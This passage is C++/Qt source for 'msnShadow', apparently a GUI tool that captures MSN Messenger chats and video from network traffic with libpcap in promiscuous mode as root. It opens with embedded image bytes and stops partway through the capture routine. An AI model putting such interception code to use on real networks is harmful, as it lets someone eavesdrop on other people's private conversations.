    0x6c, 0x36, 0x5b, 0x33, 0x8b, 0xca, 0xb2, 0x4c, 0x45, 0x45, 0x05, 0xf9,
    0xf9, 0xf9, 0x64, 0x67, 0x67, 0x93, 0x95, 0x95, 0x45, 0x4a, 0x4a, 0x0a,
    0xab, 0x57, 0xaf, 0x66, 0xc2, 0x84, 0x09, 0x64, 0x65, 0x65, 0x21, 0x49,
    0x12, 0xef, 0xbe, 0xfb, 0x2e, 0x5b, 0xb6, 0x6c, 0x41, 0x55, 0x55, 0x7e,
    0xf9, 0xe5, 0x17, 0x96, 0x2c, 0x59, 0x42, 0x4e, 0x4e, 0x0e, 0x7d, 0xfa,
    0xf4, 0xe1, 0x83, 0x0f, 0x3e, 0x20, 0x23, 0x23, 0x83, 0xf9, 0xf3, 0xe7,
    0xa3, 0x69, 0x1a, 0xb9, 0xb9, 0xb9, 0xa4, 0xa7, 0xa7, 0x33, 0x7c, 0xf8,
    0x70, 0x54, 0x55, 0xc5, 0xef, 0xf7, 0x87, 0x23, 0xc0, 0x20, 0xb9, 0x86,
    0x86, 0x06, 0xea, 0xeb, 0xeb, 0xc3, 0xb5, 0x45, 0xb4, 0x05, 0x90, 0xf9,
    0x5a, 0x9b, 0xa6, 0x41, 0xab, 0xa5, 0x8c, 0x6b, 0x8d, 0x8d, 0x8d, 0x28,
    0x8a, 0xc2, 0x5d, 0x77, 0xdd, 0x85, 0xcb, 0xe5, 0x0a, 0xcf, 0xad, 0xe6,
    0xbe, 0x45, 0x45, 0x45, 0x94, 0x96, 0x96, 0xb2, 0x7c, 0xf9, 0x72, 0x26,
    0x4e, 0x9c, 0xc8, 0x88, 0x11, 0x23, 0xe8, 0xd2, 0xa5, 0x0b, 0x55, 0x55,
    0x55, 0xe4, 0xe5, 0xe5, 0x71, 0xf0, 0xe0, 0x41, 0xec, 0x76, 0x3b, 0xa2,
    0x28, 0xb2, 0x67, 0xcf, 0x1e, 0x2a, 0x2a, 0x2a, 0x58, 0xb6, 0x6c, 0x19,
    0x53, 0xa7, 0x4e, 0x65, 0xd4, 0xa8, 0x51, 0x74, 0xed, 0xda, 0x95, 0x33,
    0x67, 0xce, 0xb0, 0x74, 0xe9, 0x52, 0x0e, 0x1e, 0x3c, 0x48, 0x5a, 0x5a,
    0x5a, 0x98, 0x3f, 0x54, 0x55, 0x0d, 0xe7, 0xb7, 0xa2, 0x28, 0x78, 0x3c,
    0x1e, 0xfc, 0x7e, 0x7f, 0x54, 0x79, 0xa3, 0xed, 0x0e, 0x59, 0x75, 0x15,
    0x5b, 0x9b, 0x06, 0xad, 0x9d, 0x8d, 0x32, 0x53, 0xd7, 0x75, 0x9a, 0x9a,
    0x9a, 0xb8, 0x72, 0xe5, 0x0a, 0x5e, 0xaf, 0x17, 0x55, 0x55, 0x09, 0x04,
    0x02, 0xe1, 0x97, 0x49, 0x92, 0xc4, 0xf1, 0xe3, 0xc7, 0x59, 0xb7, 0x6e,
    0x1d, 0x3e, 0x9f, 0x8f, 0x2e, 0x5d, 0xba, 0x00, 0xf0, 0xe9, 0xa7, 0x9f,
    0xb2, 0x6f, 0xdf, 0xbe, 0xf0, 0x94, 0xa9, 0x69, 0x1a, 0x92, 0x24, 0x51,
    0x5c, 0x5c, 0xcc, 0xc6, 0x8d, 0x1b, 0x09, 0x04, 0x02, 0x74, 0xed, 0xda,
    0x15, 0x80, 0x6d, 0xdb, 0xb6, 0xf1, 0xe5, 0x97, 0x5f, 0x46, 0xac, 0xea,
    0x02, 0x81, 0x00, 0x81, 0x40, 0x00, 0x9f, 0xcf, 0xc7, 0x95, 0x2b, 0x57,
    0xa8, 0xaf, 0xaf, 0x0f, 0x2b, 0xdf, 0x12, 0xa2, 0x6d, 0x95, 0x45, 0x70,
    0x00, 0xb4, 0x2d, 0x02, 0x44, 0x51, 0x44, 0x96, 0xe5, 0x88, 0x06, 0x84,
    0xc3, 0x52, 0x55, 0x55, 0xe0, 0xda, 0x8a, 0xcf, 0xeb, 0xf5, 0x32, 0x65,
    0xca, 0x14, 0xd6, 0xad, 0x5b, 0x87, 0xcb, 0xe5, 0xa2, 0xa8, 0xa8, 0x88,
    0xfa, 0xfa, 0x7a, 0x16, 0x2c, 0x58, 0xc0, 0x92, 0x25, 0x4b, 0x90, 0x65,
    0x39, 0xcc, 0x1d, 0x8a, 0xa2, 0xf0, 0xec, 0xb3, 0xcf, 0xb2, 0x66, 0xcd,
    0x1a, 0x64, 0x59, 0xe6, 0xc0, 0x81, 0x03, 0x34, 0x35, 0x35, 0xb1, 0x6c,
    0xd9, 0x32, 0xb2, 0xb3, 0xb3, 0x81, 0x6b, 0x55, 0xa5, 0xf1, 0x2e, 0xaf,
    0xd7, 0x8b, 0xcf, 0xe7, 0x0b, 0x1b, 0xaf, 0xb5, 0x65, 0xb4, 0xb1, 0x00,
    0xb2, 0x96, 0xc2, 0x11, 0x29, 0xd0, 0x96, 0x08, 0x30, 0xa6, 0x4a, 0xeb,
    0xd1, 0x68, 0x46, 0xde, 0x85, 0x42, 0x21, 0xec, 0x76, 0x3b, 0x39, 0x39,
    0x39, 0xcc, 0x9a, 0x35, 0x0b, 0xbf, 0xdf, 0xcf, 0xa2, 0x45, 0x8b, 0xd8,
    0xbe, 0x7d, 0x3b, 0x43, 0x87, 0x0e, 0xe5, 0xed, 0xb7, 0xdf, 0xe6, 0x85,
    0x17, 0x5e, 0x20, 0x35, 0x35, 0x95, 0x9c, 0x9c, 0x1c, 0x7e, 0xff, 0xfd,
    0x77, 0x16, 0x2f, 0x5e, 0xcc, 0x8c, 0x19, 0x33, 0x68, 0x6c, 0x6c, 0x64,
    0xde, 0xbc, 0x79, 0x7c, 0xf2, 0xc9, 0x27, 0xa4, 0xa7, 0xa7, 0xf3, 0xce,
    0x3b, 0xef, 0x90, 0x95, 0x95, 0x45, 0xdf, 0xbe, 0x7d, 0xe9, 0xd6, 0xad,
    0x1b, 0x9a, 0xa6, 0x45, 0x94, 0xb3, 0x86, 0x52, 0x46, 0x3d, 0x61, 0x28,
    0x18, 0xcd, 0x08, 0xe6, 0xe3, 0x2d, 0x91, 0xa0, 0xb1, 0x60, 0xb2, 0x2a,
    0x6e, 0x6e, 0xb2, 0x2c, 0xa3, 0x69, 0x1a, 0xa9, 0xa9, 0xa9, 0xa4, 0xa6,
    0xa6, 0x72, 0xf2, 0xe4, 0x49, 0xb2, 0xb3, 0xb3, 0x39, 0x76, 0xec, 0x18,
    0x4e, 0xa7, 0x93, 0x92, 0x92, 0x12, 0x32, 0x33, 0x33, 0x59, 0xb6, 0x6c,
    0x19, 0xe3, 0xc6, 0x8d, 0xe3, 0xa3, 0x8f, 0x3e, 0xa2, 0xae, 0xae, 0x8e,
    0x61, 0xc3, 0x86, 0x51, 0x56, 0x56, 0xc6, 0xa2, 0x45, 0x8b, 0x28, 0x29,
    0x29, 0xc1, 0xe5, 0x72, 0x71, 0xe4, 0xc8, 0x11, 0x26, 0x4f, 0x9e, 0xcc,
    0x8a, 0x15, 0x2b, 0x78, 0xfc, 0xf1, 0xc7, 0x01, 0xf8, 0xe3, 0x8f, 0x3f,
    0xc2, 0x91, 0x67, 0x4e, 0x21, 0x41, 0x10, 0x22, 0x8e, 0x56, 0x02, 0x8c,
    0x46, 0x82, 0xcd, 0x52, 0xa0, 0xb5, 0x4a, 0xd0, 0x38, 0xca, 0xb2, 0x1c,
    0x3e, 0xb6, 0xd4, 0x0c, 0x83, 0x1d, 0x3f, 0x7e, 0x9c, 0xe9, 0xd3, 0xa7,
    0xf3, 0xd3, 0x4f, 0x3f, 0x11, 0x1b, 0x1b, 0x8b, 0xcd, 0x66, 0xc3, 0xed,
    0x76, 0x73, 0xf9, 0xf2, 0x65, 0x5e, 0x7d, 0xf5, 0x55, 0xd6, 0xae, 0x5d,
    0x4b, 0x52, 0x52, 0x12, 0xc3, 0x86, 0x0d, 0x63, 0xf7, 0xee, 0xdd, 0x3c,
    0xf7, 0xdc, 0x73, 0x9c, 0x38, 0x71, 0x02, 0xb7, 0xdb, 0x8d, 0xcd, 0x66,
    0x23, 0x26, 0x26, 0x86, 0xea, 0xea, 0x6a, 0x9e, 0x7f, 0xfe, 0x79, 0x3e,
    0xfb, 0xec, 0x33, 0xe0, 0x5a, 0x6d, 0x61, 0x84, 0xbc, 0xd1, 0x0c, 0x99,
    0xcc, 0xcd, 0x5c, 0x74, 0x99, 0x8d, 0x60, 0x26, 0xc1, 0x9b, 0x4a, 0x01,
    0xf3, 0xe0, 0xd6, 0x28, 0x30, 0x9f, 0x6b, 0x9a, 0x46, 0x41, 0x41, 0x01,
    0x6f, 0xbe, 0xf9, 0x26, 0x29, 0x29, 0x29, 0x4c, 0x9c, 0x38, 0x91, 0xed,
    0xdb, 0xb7, 0x87, 0x23, 0x48, 0x10, 0x04, 0x6c, 0x36, 0x1b, 0xa1, 0x50,
    0x88, 0x8d, 0x1b, 0x37, 0x52, 0x5e, 0x5e, 0x4e, 0xe7, 0xce, 0x9d, 0xd9,
    0xb3, 0x67, 0x0f, 0x81, 0x40, 0x00, 0xe3, 0x53, 0x9c, 0x79, 0xcd, 0x3e,
    0x7a, 0xf4, 0x68, 0x86, 0x0f, 0x1f, 0x0e, 0xc0, 0xde, 0xbd, 0x7b, 0xb9,
    0x7c, 0xf9, 0x32, 0x76, 0xbb, 0xbd, 0x59, 0x29, 0x6d, 0x78, 0xdf, 0x80,
    0x75, 0x37, 0xc8, 0x1c, 0x01, 0x51, 0x53, 0xa0, 0x25, 0x12, 0xb4, 0x5a,
    0xb7, 0x25, 0xe5, 0x8d, 0xb6, 0x6d, 0xdb, 0x36, 0x6a, 0x6a, 0x6a, 0x58,
    0xbe, 0x7c, 0x39, 0x6f, 0xbc, 0xf1, 0x06, 0x03, 0x07, 0x0e, 0x64, 0xd5,
    0xaa, 0x55, 0xd4, 0xd7, 0xd7, 0xe3, 0x70, 0x38, 0x22, 0xc6, 0x36, 0x76,
    0x6f, 0x1d, 0x0e, 0x47, 0x78, 0x2b, 0xdb, 0x60, 0x7a, 0xbb, 0xdd, 0xce,
    0x9c, 0x39, 0x73, 0x58, 0xb0, 0x60, 0x01, 0xa1, 0x50, 0x88, 0xbc, 0xbc,
    0x3c, 0xb6, 0x6e, 0xdd, 0x8a, 0xa6, 0x69, 0xc8, 0xb2, 0x1c, 0x56, 0xd0,
    0xea, 0x6d, 0x03, 0x06, 0x69, 0x9a, 0x15, 0x6f, 0xe9, 0xe3, 0x8a, 0xdc,
    0x52, 0x25, 0xd8, 0x9a, 0x01, 0x5a, 0x22, 0x43, 0xbb, 0xdd, 0xce, 0x37,
    0xdf, 0x7c, 0xc3, 0xf9, 0xf3, 0xe7, 0x59, 0xba, 0x74, 0x29, 0x13, 0x27,
    0x4e, 0x24, 0x25, 0x25, 0x85, 0xbc, 0xbc, 0x3c, 0x4a, 0x4b, 0x4b, 0x23,
    0x96, 0xa8, 0xe6, 0x45, 0x8d, 0x21, 0x9c, 0xa2, 0x28, 0x24, 0x24, 0x24,
    0xb0, 0x78, 0xf1, 0x62, 0xc6, 0x8e, 0x1d, 0xcb, 0x85, 0x0b, 0x17, 0xc8,
    0xc9, 0xc9, 0xe1, 0xdb, 0x6f, 0xbf, 0x45, 0x96, 0xe5, 0x70, 0x04, 0x19,
    0x51, 0x62, 0x78, 0xbd, 0xa5, 0x52, 0xbe, 0xa5, 0x08, 0x30, 0x3b, 0xbc,
    0xd5, 0x69, 0x30, 0x5a, 0x0a, 0x98, 0xb9, 0xc0, 0x9c, 0x8b, 0x46, 0x73,
    0xbb, 0xdd, 0x54, 0x56, 0x56, 0x86, 0x19, 0x7d, 0xc0, 0x80, 0x01, 0xe4,
    0xe7, 0xe7, 0x33, 0x69, 0xd2, 0xa4, 0x70, 0x0e, 0x5a, 0xb9, 0x43, 0x92,
    0x24, 0x82, 0xc1, 0x20, 0xf7, 0xdd, 0x77, 0x1f, 0x9b, 0x36, 0x6d, 0x62,
    0xec, 0xd8, 0xb1, 0x1c, 0x3d, 0x7a, 0x94, 0x59, 0xb3, 0x66, 0x71, 0xf4,
    0xe8, 0x51, 0x62, 0x62, 0x62, 0xb0, 0xd9, 0x6c, 0x51, 0x1d, 0xd2, 0x9a,
    0x83, 0xcc, 0xc6, 0xbd, 0xe9, 0x52, 0xf8, 0x56, 0xa3, 0xc0, 0x88, 0x84,
    0x40, 0x20, 0xc0, 0xea, 0xd5, 0xab, 0xf9, 0xf5, 0xd7, 0x5f, 0x79, 0xe5,
    0x95, 0x57, 0xc8, 0xcd, 0xcd, 0xa5, 0x5f, 0xbf, 0x7e, 0x6c, 0xde, 0xbc,
    0x19, 0xbf, 0xdf, 0x1f, 0xae, 0x23, 0x0c, 0xe6, 0x9e, 0x3c, 0x79, 0x32,
    0xf3, 0xe7, 0xcf, 0xc7, 0xe5, 0x72, 0xb1, 0x6d, 0xdb, 0x36, 0x36, 0x6c,
    0xd8, 0x80, 0xc7, 0xe3, 0x21, 0x26, 0x26, 0x26, 0x2a, 0xe3, 0x5b, 0x61,
    0x28, 0x68, 0x96, 0xa7, 0x4d, 0x1c, 0xd0, 0xda, 0x87, 0x09, 0x6b, 0x14,
    0x58, 0x15, 0x6f, 0xcd, 0x08, 0xc6, 0x7c, 0xbd, 0x7b, 0xf7, 0x6e, 0x2a,
    0x2b, 0x2b, 0x79, 0xed, 0xb5, 0xd7, 0x98, 0x36, 0x6d, 0x1a, 0xc9, 0xc9,
    0xc9, 0xac, 0x59, 0xb3, 0x86, 0x0b, 0x17, 0x2e, 0x20, 0x8a, 0x22, 0xb1,
    0xb1, 0xb1, 0xcc, 0x9e, 0x3d, 0x9b, 0x8c, 0x8c, 0x0c, 0xbc, 0x5e, 0x2f,
    0xb9, 0xb9, 0xb9, 0xec, 0xdf, 0xbf, 0x1f, 0x00, 0x87, 0xc3, 0x11, 0xb1,
    0x93, 0xdb, 0x5a, 0xc8, 0x9b, 0x61, 0xd6, 0xa9, 0x4d, 0xcb, 0xe1, 0x96,
    0x60, 0x44, 0x80, 0x79, 0xae, 0x6f, 0xcb, 0xcc, 0x60, 0x18, 0x4e, 0x14,
    0x45, 0x6c, 0x36, 0x1b, 0xa5, 0xa5, 0xa5, 0x2c, 0x5c, 0xb8, 0x90, 0x97,
    0x5f, 0x7e, 0x99, 0xf4, 0xf4, 0x74, 0xd6, 0xac, 0x59, 0xc3, 0xea, 0xd5,
    0xab, 0xa9, 0xad, 0xad, 0x65, 0xc1, 0x82, 0x05, 0x0c, 0x1a, 0x34, 0x88,
    0xd3, 0xa7, 0x4f, 0xb3, 0x72, 0xe5, 0xca, 0x30, 0x57, 0x98, 0x2b, 0xb8,
    0xd6, 0x18, 0xdf, 0xec, 0x7d, 0xeb, 0x54, 0xd7, 0x52, 0x1d, 0x10, 0xb1,
    0x21, 0xd2, 0x92, 0x45, 0xcd, 0x03, 0x59, 0x95, 0xb5, 0x1a, 0xe2, 0x46,
    0x51, 0x60, 0xb3, 0xd9, 0x68, 0x6c, 0x6c, 0x64, 0xc5, 0x8a, 0x15, 0x4c,
    0x9d, 0x3a, 0x95, 0xcc, 0xcc, 0x4c, 0xde, 0x7a, 0xeb, 0x2d, 0xae, 0x5e,
    0xbd, 0x4a, 0x7c, 0x7c, 0x3c, 0x5f, 0x7f, 0xfd, 0x35, 0xf9, 0xf9, 0xf9,
    0xd4, 0xd5, 0xd5, 0xe1, 0x76, 0xbb, 0x23, 0x4a, 0x58, 0xab, 0xd7, 0xa3,
    0x2d, 0x78, 0x0c, 0x85, 0xac, 0x69, 0x10, 0x2d, 0x02, 0xac, 0x90, 0x6f,
    0xf4, 0x49, 0xca, 0xea, 0x5d, 0x6b, 0x0a, 0xb4, 0x36, 0x3d, 0x1a, 0x91,
    0x60, 0x1c, 0x75, 0x5d, 0xe7, 0xe3, 0x8f, 0x3f, 0xa6, 0xaa, 0xaa, 0x8a,
    0xb9, 0x73, 0xe7, 0x12, 0x17, 0x17, 0xc7, 0x87, 0x1f, 0x7e, 0xc8, 0x17,
    0x5f, 0x7c, 0x81, 0xa6, 0x69, 0xb8, 0xdd, 0x6e, 0x34, 0x4d, 0x8b, 0x08,
    0x7b, 0x6b, 0xf8, 0x5b, 0xbd, 0x6e, 0x56, 0xde, 0x98, 0x4e, 0xcd, 0xe5,
    0xf9, 0x4d, 0x97, 0xc2, 0xe6, 0x07, 0xa2, 0x79, 0xb6, 0x2d, 0xec, 0x1b,
    0x2d, 0x0a, 0x0c, 0x8f, 0xd8, 0xed, 0x76, 0x8e, 0x1d, 0x3b, 0x46, 0x75,
    0x75, 0x35, 0x4e, 0xa7, 0x93, 0x93, 0x27, 0x4f, 0x86, 0xc7, 0x30, 0x14,
    0x37, 0x87, 0x7d, 0x6b, 0xdb, 0x5f, 0x66, 0x43, 0x18, 0x06, 0xb6, 0x2e,
    0xcf, 0xad, 0x06, 0xb0, 0x2e, 0x89, 0x23, 0x0c, 0x60, 0xb5, 0x98, 0x21,
    0x48, 0x28, 0x14, 0x0a, 0xbf, 0xc0, 0x5c, 0xa9, 0x59, 0x97, 0x99, 0x06,
    0xac, 0xde, 0x33, 0x37, 0xc3, 0x08, 0x17, 0x2e, 0x5c, 0x40, 0xd7, 0x75,
    0x6c, 0x36, 0x5b, 0x8b, 0x63, 0x98, 0x65, 0xb2, 0x36, 0xf3, 0x0a, 0xcf,
    0x90, 0xd3, 0x68, 0xc6, 0xbd, 0x68, 0x06, 0xb0, 0x22, 0x22, 0x05, 0xcc,
    0x82, 0x88, 0xa2, 0x48, 0xd7, 0xae, 0x5d, 0xe9, 0xd7, 0xaf, 0x1f, 0x2e,
    0x97, 0xab, 0xcd, 0x73, 0x6f, 0x34, 0x22, 0x34, 0x2c, 0x1e, 0xad, 0xde,
    0x30, 0x2b, 0x65, 0x4c, 0x89, 0xe6, 0xfc, 0x8f, 0x76, 0x0c, 0x06, 0x83,
    0x11, 0xca, 0x1a, 0xbf, 0x8d, 0x73, 0x9f, 0xcf, 0x47, 0x62, 0x62, 0x62,
    0x9b, 0x16, 0x43, 0x72, 0x34, 0x61, 0x42, 0xa1, 0x10, 0xb1, 0xb1, 0xb1,
    0xcc, 0x9d, 0x3b, 0x97, 0x39, 0x73, 0xe6, 0x44, 0xb5, 0x5c, 0x6b, 0x56,
    0xbd, 0xd5, 0x7b, 0x77, 0xe2, 0xba, 0xd9, 0x81, 0xb5, 0xb5, 0xb5, 0x37,
    0xac, 0x04, 0x65, 0x9b, 0xcd, 0x26, 0x44, 0x4b, 0x01, 0x4d, 0xd3, 0x08,
    0x06, 0x83, 0x2d, 0x86, 0xe0, 0xdf, 0xa1, 0xb5, 0xb4, 0x28, 0x32, 0x13,
    0xaa, 0xd8, 0xd4, 0xd4, 0xe4, 0xad, 0xa9, 0xa9, 0xd1, 0xcd, 0x1d, 0xff,
    0x6c, 0x21, 0xff, 0x55, 0xcd, 0xfa, 0x1e, 0xa7, 0xd3, 0x49, 0x30, 0x18,
    0xa4, 0xa6, 0xa6, 0xa6, 0x11, 0xd0, 0x01, 0xc4, 0x5d, 0xbb, 0x76, 0x95,
    0x55, 0x54, 0x54, 0x94, 0x05, 0x02, 0x81, 0x88, 0xa9, 0xe3, 0x3f, 0xad,
    0x85, 0x42, 0x21, 0xba, 0x77, 0xef, 0xce, 0x89, 0x13, 0x27, 0x82, 0xc5,
    0xc5, 0xc5, 0xe5, 0x80, 0x0f, 0x40, 0xf2, 0xf9, 0x7c, 0xde, 0x98, 0x98,
    0x18, 0xa9, 0x73, 0xe7, 0xce, 0x8f, 0xf6, 0xe9, 0xd3, 0x27, 0xdc, 0xf9,
    0x5f, 0x29, 0xc8, 0x9f, 0xfd, 0xbc, 0x24, 0x49, 0xf4, 0xea, 0xd5, 0x8b,
    0xc6, 0xc6, 0x46, 0x36, 0x6c, 0xd8, 0xf0, 0xe3, 0xa1, 0x43, 0x87, 0x76,
    0x01, 0x65, 0x80, 0x2a, 0x03, 0xda, 0x8e, 0x1d, 0x3b, 0x3e, 0x05, 0x92,
    0xaf, 0x5c, 0xb9, 0xf2, 0xc2, 0x83, 0x0f, 0x3e, 0x68, 0x8b, 0x8d, 0x8d,
    0x8d, 0x5a, 0x48, 0x44, 0xfb, 0x6d, 0x26, 0x98, 0xb6, 0xf4, 0xbf, 0x53,
    0x7d, 0xdb, 0x72, 0xae, 0xeb, 0x7a, 0x78, 0x37, 0xea, 0xf4, 0xe9, 0xd3,
    0x14, 0x14, 0x14, 0xfc, 0xcf, 0x8e, 0x1d, 0x3b, 0x3e, 0x03, 0x4e, 0x00,
    0x1e, 0xf8, 0xbf, 0x7f, 0x8b, 0x4b, 0x40, 0xcf, 0x81, 0x03, 0x07, 0x3e,
    0x39, 0x72, 0xe4, 0xc8, 0xc7, 0x07, 0x0d, 0x1a, 0x94, 0xec, 0x72, 0xb9,
    0xec, 0xc6, 0x80, 0x56, 0xdc, 0x68, 0x31, 0xf2, 0x57, 0xc1, 0xf5, 0x6f,
    0x09, 0x7a, 0x79, 0x79, 0xf9, 0xe5, 0x83, 0x07, 0x0f, 0x1e, 0x2f, 0x29,
    0x29, 0xf9, 0x16, 0xf8, 0x0e, 0x28, 0x07, 0x14, 0x88, 0xfc, 0xbb, 0xbc,
    0x04, 0x74, 0x01, 0xfa, 0x02, 0x49, 0xc0, 0x5d, 0xd7, 0xaf, 0xfd, 0xdd,
    0xa1, 0x03, 0x57, 0x81, 0x2a, 0xe0, 0x34, 0x70, 0x1e, 0x50, 0x8d, 0x9b,
    0xd1, 0x5c, 0x69, 0x07, 0xdc, 0xd7, 0x8f, 0x7f, 0x0f, 0x57, 0xdf, 0x18,
    0x41, 0xae, 0x85, 0xbc, 0xc2, 0x75, 0xf6, 0x6f, 0x47, 0x3b, 0xda, 0xd1,
    0x8e, 0x76, 0xb4, 0xa3, 0x1d, 0xfc, 0x2f, 0x67, 0xc4, 0x0e, 0x6a, 0x80,
    0xb4, 0xe4, 0x23, 0x00, 0x00, 0x00, 0x00, 0x49, 0x45, 0x4e, 0x44, 0xae,
    0x42, 0x60, 0x82
};




/*
 *  Constructs a msnShadow as a child of 'parent', with the
 *  name 'name' and widget flags set to 'f'.
 *
 */
msnShadow::msnShadow( QApplication *_appz, QWidget* parent, const char* name, WFlags fl )
    : QMainWindow( parent, name, fl ), appz(_appz)
{
    (void)statusBar();
    QImage img;
    img.loadFromData( image0_data, sizeof( image0_data ), "PNG" );
    image0 = img;
    img.loadFromData( image1_data, sizeof( image1_data ), "PNG" );
    image1 = img;
    img.loadFromData( image2_data, sizeof( image2_data ), "PNG" );
    image2 = img;
    img.loadFromData( image3_data, sizeof( image3_data ), "PNG" );
    image3 = img;
    img.loadFromData( image4_data, sizeof( image4_data ), "PNG" );
    image4 = img;
    img.loadFromData( image5_data, sizeof( image5_data ), "PNG" );
    image5 = img;
    img.loadFromData( image6_data, sizeof( image6_data ), "PNG" );
    image6 = img;
    img.loadFromData( image7_data, sizeof( image7_data ), "PNG" );
    image7 = img;
    img.loadFromData( image8_data, sizeof( image8_data ), "PNG" );
    image8 = img;
    img.loadFromData( image9_data, sizeof( image9_data ), "PNG" );
    image9 = img;
    img.loadFromData( image10_data, sizeof( image10_data ), "PNG" );
    image10 = img;
    img.loadFromData( image11_data, sizeof( image11_data ), "PNG" );
    image11 = img;
    img.loadFromData( tab1_image, sizeof( tab1_image ), "PNG" );
    tab11_image = img;
    img.loadFromData( tab2_image, sizeof( tab2_image ), "PNG" );
    tab22_image = img;
    if ( !name )
	setName( "msnShadow" );
    setCentralWidget( new QWidget( this, "qt_central_widget" ) );
    msnShadowLayout = new QGridLayout( centralWidget(), 1, 1, 11, 6, "msnShadowLayout"); 

    tabWidget2 = new QTabWidget( centralWidget(), "tabWidget2" );

    tab = new QWidget( tabWidget2, "tab" );
	

    userView = new QListView( tab, "userView" );
    userView->addColumn( "" );
	userView->header()->hide();
	userView->clear();
	
    userView->setGeometry( QRect( 10, 10, 130, 360 ) );

	
    widgetStack1 = new QWidgetStack( tab, "widgetStack1" );
	
    widgetStack1->setGeometry( QRect( 141, 8, 430, 380 ) );

    WStackPage = new QWidget( widgetStack1, "WStackPage" );

	

	

    msgView = new QListView( WStackPage, "msgView" );

    msgView->addColumn( tr( "" ) );
	connect(msgView, SIGNAL(contextMenuRequested(QListViewItem*, const QPoint&,int)), this, SLOT(contextMenuSpoof(QListViewItem*, const QPoint&,int)));
	msgView->header()->hide();
    msgView->setGeometry( QRect( 9, 2, 410, 360 ) );
    widgetStack1->addWidget( WStackPage, 0 );

	configPtr = new configDlg(this);
	configPtrGlobal = configPtr;

    startTextButton = new QPushButton( tab, "startTextButton" );
    startTextButton->setGeometry( QRect( 40, 420, 120, 24 ) );
    startTextButton->setIconSet( QIconSet( image0 ) );



    stopTextButton = new QPushButton( tab, "stopTextButton" );
    stopTextButton->setGeometry( QRect( 320, 420, 100, 24 ) );
    stopTextButton->setIconSet( QIconSet( image1 ) );
    tabWidget2->insertTab( tab, QString::fromLatin1("") );

    tab_2 = new QWidget( tabWidget2, "tab_2" );
    tabWidget2->insertTab( tab_2, QString::fromLatin1("") );
	tabWidget2->setTabIconSet(tab, QIconSet(tab11_image));
	tabWidget2->setTabIconSet(tab_2, QIconSet(tab22_image));
	videoView = new QListView(tab_2, "videoView");
	videoView->addColumn("");
	videoView->header()->hide();
	videoView->clear();
	videoView->setGeometry( QRect( 10, 10, 130, 360 ) );
	startVideoButton = new QPushButton( tab_2, "startVideoButton" );
    startVideoButton->setGeometry( QRect( 40, 420, 120, 24 ) );
    startVideoButton->setIconSet( QIconSet( image0 ) );
stopVideoButton = new QPushButton( tab_2, "stopTextButton" );
    stopVideoButton->setGeometry( QRect( 320, 420, 100, 24 ) );
    stopVideoButton->setIconSet( QIconSet( image1 ) );
	stopVideoButton->setEnabled(false);
	stopVideoButton->setText("Stop");
widgetStack2 = new QWidgetStack(tab_2);
	widgetStack2->setGeometry( QRect( 141, 8, 430, 380 ) );
	
	


WStackPageVideo = new QWidget( widgetStack2, "WStackPage" );
widgetStack2->addWidget( WStackPageVideo, 0 );
    msnShadowLayout->addWidget( tabWidget2, 0, 0 );

    
	helpAboutAction = new QAction( this, "helpAboutAction" );
	optionsAction = new QAction(this);
	reportAction = new QAction(this);
	contactAction = new QAction(this);
	pcapFileAction = new QAction(this);
    MenuBar = new QMenuBar( this, "MenuBar" );


    fileMenu = new QPopupMenu( this );
   
    MenuBar->insertItem( QString(""), fileMenu, 1 );
	id = 0;
	idVideo = 3;
	isSniffing = false;
	decoderBuffer = new char[10000];
	indexDz = 0;
	
	
    

    helpMenu = new QPopupMenu( this );
    helpMenu->insertSeparator();
    helpAboutAction->addTo( helpMenu );
	optionsAction->addTo(fileMenu);
	reportAction->addTo(fileMenu);
	contactAction->addTo(fileMenu);
	pcapFileAction->addTo(fileMenu);
    MenuBar->insertItem( QString(""), helpMenu, 3 );
	ptrWindow = this;
    languageChange();
	setMinimumSize(600, 571);
    resize( QSize(600, 571).expandedTo(minimumSizeHint()) );
	
    clearWState( WState_Polished );

    
    connect( helpAboutAction, SIGNAL( activated() ), this, SLOT( helpAbout() ) );
	connect(optionsAction, SIGNAL(activated()), this, SLOT(optionsW()));
	connect(reportAction, SIGNAL(activated()), this, SLOT(htmlReport()));
	connect(contactAction, SIGNAL(activated()), this, SLOT(contactOpen()));
	connect(pcapFileAction, SIGNAL(activated()), this, SLOT(pcapFileOpen()));
	connect(userView, SIGNAL(clicked(QListViewItem*)), this, SLOT( chatClicked(QListViewItem*)));
	connect(videoView, SIGNAL(clicked(QListViewItem*)), this, SLOT( videoClicked(QListViewItem*)));
	connect(startTextButton, SIGNAL(clicked()), this, SLOT(startTextSniff()));
	connect(stopTextButton, SIGNAL(clicked()), this, SLOT(stopTextSniff()));
	stopTextButton->setEnabled(false);
	connect(startVideoButton, SIGNAL(clicked()), this, SLOT(startVideoSniff()));
	connect(stopVideoButton, SIGNAL(clicked()), this, SLOT(stopVideoSniff()));
	
}

/*
 *  Destroys the object and frees any allocated resources
 */
msnShadow::~msnShadow()
{
    // no need to delete child widgets, Qt does it all for us
}

void msnShadow::chatClicked(QListViewItem *i) {
if(!i)
return;
msnShadowItemChat *chat = (msnShadowItemChat*)i;
widgetStack1->raiseWidget(chat->id);
}

void msnShadow::videoClicked(QListViewItem *i) {
if(!i)
return;
msnShadowItemVideo *video = (msnShadowItemVideo*)i;
widgetStack2->raiseWidget(video->id);

}

void msnShadow::stopTextSniff() {
isSniffing = false;
stopTextButton->setEnabled(false);
startTextButton->setEnabled(true);
}

void msnShadow::stopVideoSniff() {
isSniffingVideo = false;
stopVideoButton->setEnabled(false);
startVideoButton->setEnabled(true);
}

void msnShadow::startTextSniff() {

pthread_t tid;
isSniffing = true;
char *dev, errbuf[PCAP_ERRBUF_SIZE];
pcap_t *man;
char bosta[200];
struct bpf_program filter;

QString filter_app = configPtr->textString;

unsigned char packet[65535];

if((getuid())){
	QMessageBox::information(this, "Root?", "You must be ROOT!");
	return;
}
bpf_u_int32 mask;
bpf_u_int32 net;
dev = pcap_lookupdev(errbuf);
if( (configPtr->textBox->text(configPtr->textBox->currentItem()).isEmpty()) ) {
	QMessageBox::critical(this, "Interface Error", "Choose a interface");
	return;
}
dev = (char*)configPtr->textBox->text(configPtr->textBox->currentItem()).ascii();
if( (pcap_lookupnet(dev, &net, &mask, errbuf)) == -1){
	QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

man = pcap_open_live(dev, BUFSIZ, 1, 0, errbuf);
if(man == NULL) {
	QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

if( (pcap_compile(man, &filter, (char*)filter_app.ascii(), 0, net)) == -1){
QMessageBox::critical(this, "PCAP Error", "Filter Error");
